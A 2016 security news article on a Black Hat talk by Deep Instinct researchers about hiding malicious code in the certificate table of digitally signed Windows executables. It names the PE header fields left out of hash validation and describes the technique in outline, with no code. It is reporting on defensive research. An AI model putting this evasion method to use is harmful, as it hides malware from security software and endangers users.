Secretly Infecting Digitally Signed Files

Thursday, August 11, 2016 @ 12:08 PM gHale


There is a way to inject malware inside a digitally signed binary without affecting the overall file hash.

Being able to pull off that feat would mean antivirus and security software won’t detect the malicious file, said researchers at security provider, Deep Instinct at a Black Hat USA 2016 presentation.

RELATED STORIES
Black Hat: Worm Growing in PLC
Black Hat: Hacking a Car, Again
Black Hat: The Forensics Factor
Black Hat: Drone ICS Attack Possible
Black Hat: IT-OT Learning Curve

When users double-click an executable and launch it, Windows does three things. It first reads the file’s PE headers, validates the certificate, and validates the file hash.

After reverse-engineering this entire process, the Deep Instinct team discovered Windows does not include three fields from the PE headers in the file hash validation process and that modifying these three fields does not break the certificate’s validity.

The fields are the file’s Checksum, its attribute certificate table, and the IMAGE_DIRECTORY_ENTRY_SECURITY field from the DataDirectory section.

In proof-of-concept code, the research team inserted malicious code inside the attribute certificate table, successfully leaving the digital certificate and the file hash intact.

This method is so efficient that malware coders do not even need to hide their malicious code. The reason is antivirus and security software automatically ignores any digitally signed file.

By leaving the file hash intact, this technique also bypasses any secondary checks security software might perform besides checking for a digital certificate.

Researchers also bypassed the problem of not being able to launch into execution malicious code from a file’s attribute certificate table, which resides in the file’s digital certificate.

Despite their success, the Deep Instinct team said their Reflective PE Loader does not support 64-bit architectures, at least for now.

For malware authors this approach provides a way to hide malicious code in plain sight, right in the digital certificate, the file section that authenticates a file’s origin and safeguards users from malware.

Click here to download the paper from Black Hat USA 2016.